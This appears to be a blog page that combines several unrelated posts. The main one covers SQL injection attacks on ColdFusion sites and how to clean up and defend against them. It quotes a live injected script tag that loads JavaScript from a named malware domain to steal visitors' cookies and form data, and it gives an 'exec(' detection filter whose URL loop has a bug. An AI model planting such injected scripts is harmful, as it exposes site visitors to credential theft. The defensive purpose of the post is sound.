This week there has been an increase in SQL Injection attacks, specifically against ColdFusion sites since the hackers have discovered they are also vulnerable, primarily due to most developers not using <cfqueryparam>. You should also be aware that prior to the actual attacks, bots are first running vulnerability tests against sites to find out which language and which database they are using to determine which vulberability they may be vulberable to.

Use of cfqueryparam is pretty much a must have requirement for your queries these days and is generally secure because it results in a prepared statement, which is always binded as a string, which is not vulnerable to sql injection. But, many ColdFusion developers do not seem to use cfqueryparam probably due to not knowing it exists. In fact CFQueryParam has existed since CF4.5, andI have to admit even I didn't know that, it has only really been promoted as a best practice and way to avoid SQL injection since CF6.

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

Like standard SQL injection, ColdFusion attacks have been around for years. What appears to have happened now appears to be the same thing that led to the millions of compromises in the ASP/SQL Server attacks - the use of automated tools.

Following are some of the malware domains involved in the recent ColdFusion attacks:

• mh.976801.cn
• 1.verynx.cn
• mm.ll80.com

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

</title><script src="http://1.verynx.cn/w.js"></script>

The resulting javascript which gets loaded into your pages is used to "phish" your visitors details by copying their cookies and other personal details from form fields. There are various incarnations of this attack now, resulting in different scripts being inserted into your database. If restoring a database backup is not an option for you, then the following little script may help you out.

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor


This script will UNDO the changes made by the attack by searching for the afore mentioned string in all columns in all table in your database and removing it. All you need to do is modify the string to match the changes that were made to your database. If your site was attacked multiple times then the string may appear more than one, so you may have to run this script more than once.

Protecting Yourself 

All of the attacks we have seen so far seem to be implemented by using the "Exec()" command, so are only affecting Microsoft SQL Server databases. So a quick and easy way to stop this is to add a URL and FORM scope validation script to your application.cfm or application.cfc to make sure none of these variables contain the Exec() command.

E.G.

<cfloop collection="#form#" item="item">
 <cfif form[item] contains "exec(">
    .. your decision code here ...
 </cfif>
</cfloop>
<cfloop collection="#URL#" item="item">
 <cfif form[item] contains "exec(">
     .. your decision code here ...
 </cfif>
</cfloop>

You could of course expand this further to check for any kind of SQL statement in the FORM or URL scope, as really there never should be any SQL in these scopes if your code is well written. Your decision code will determine what happens if a match is found. As it is obviously an attack there is no point in continuing to process the request and strip out the unwanted strings, so you may as well just abort it or generate an error page.

You should of course also be adding cfqueryparam tags to all your queries too, or if you are still running older version of CF then you should be validating the data types in another way, using <cfapram> or val() for example.

The best approach you can take is to lock down your database users with specific permissions so that your web site can only SELECT from the database and cannot update, delete, execute. You should ideally only allow these permissions from your backend admin system. If there are parts of your site that need to update the database, restrict the dbuser or DSN to only be able to update the specific tables/columns they need to.

If you need to find out which pages in your site have been attacked, then you should check your web logs, and search for things like "exec" or "declare" or other sql statements.

If you have been using SQL Server 2005 express  you will no doubt have noticed the lack of any backup options in SQL Web Studio Express or an SQLAgent, which is a big issue as you should be keeping backups of your databases.

Thankfully there is a solution using the expressmaint utility and windows scheduled tasks, and I found this handy article on how to use this solution to overcome this limitation of SQL Server 2005 express.

Now I just need to find a solution for the lack of import/export facilities, which I think is a major exclusion from the Web Studio Express and really limits its usefulness. 

If you’re a fan of the Sysinternals tools, check out the beta of Sysinternals Live, a service that makes it easy for you to execute Sysinternals tools directly from the Web without hunting for and manually downloading them. Simply enter a tool’s Sysinternals Live path into Windows Explorer, or at the command prompt as \\live.sysinternals.com\tools\<toolname>, or view the entire Sysinternals Live tools directory in a browser.

The Sysinternals tools are a must have for any system administrators toolbox, I regularly use the sysmon and filemon to diagnose system problems, and for you ColdFusion admins it is especially useful for tracking down ColdFusion permission issues when you are locking down a ColdFusion installation.

Like many, I have contacted Trading Standards on several occasions, some of which are mentioned on this very site in my "Rogue Traders" section, but sadly their responses have generally been just to provide information on how to take action yourself.

The usual response you get from them is "we cannot help with civil matters", so I decided to ask them straight out what they consider to be a civil matter as it seemed to be just about everything I ever contacted them about. I have pasted their response below, as you can see  they are saying that any matter resulting from the purchase of good or services falls under "civil law".

Now what situation are you likely to contact them about that doesn't involve the purchase of goods or services? there certainly are not many I can think of, therefore anything you contact them about will automatically fall under "civil law" and thus they are effectively saying that they will not be able to help you or take any action.

Things that fall outside civil law would be cases where a trader is acting illegally or committing a criminal offence, or a health and safety issue in which case Trading Standards say they may be able to investigate or take some action, but these things do invariably take a very long time.

Like most I always thought that Trading Standards were there to protect the public from the rogue traders and rip-off merchants and that some good would come out of reporting such people to them and that they would eventually be stopped, but this doesn't appear to be the case at all as the law seems to stop them doing anything and is on the side of the criminals. Just have a look at my Sky Scammers post and see how many comments there are from people who have been duped, and in fact one of the companies mentioned have been on BBC Watchdog so they are scamming thousands of people all over the country every day. Most of the people who commented have contacted Trading Standards, and clearly fraudulently charging peoples credit cards and scaming them into signing up their services by pretending to be SKY canot be a civil matter as they are breaking the law, so one has to wonder how they been able to get away with it for so long.

To be honest I am not sure whether the fault lay with the law or with Trading standards, but either way something clealry needs to change to put a stop to these rogue traders who seem to have a "license to con" without any reprise and the public seem to have no rights when this happens other than to try and take legal action.

Read more...

SwitchBlade Windshield	SwitchBlade quick release mount system	Windshield bag

The SwitchBlade® Windshields utilises the new SwitchBlade Mounting System, which allows riders to easily install, switch, or remove their windshield in less than 5 seconds

Read more...